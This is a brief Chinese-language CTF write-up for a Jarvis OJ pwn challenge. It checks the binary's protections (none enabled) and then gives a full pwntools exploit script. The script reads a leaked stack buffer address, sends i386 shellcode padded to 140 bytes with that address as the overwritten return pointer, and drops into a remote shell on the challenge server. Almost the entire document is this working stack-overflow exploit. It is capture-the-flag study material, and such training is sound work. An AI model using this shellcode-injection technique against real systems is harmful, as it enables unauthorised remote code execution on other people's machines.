看下防护
啥也没开。
放IDA里看下:
很显然,利用泄露的数组的首地址来写通解,就不用管ASLR了。
exp如下:
from pwn import*
a=remote("pwn2.jarvisoj.com","9877")
a.recvuntil("What's this:")
addr=a.recvuntil("?")
addr=addr[0:-1]
addr1=eval(addr)
print(addr)
shellcode=asm(shellcraft.i386.linux.sh())
print(len(shellcode))
payload=shellcode+'A'*(140-len(shellcode))+p32(addr1)
a.send(payload)
a.interactive()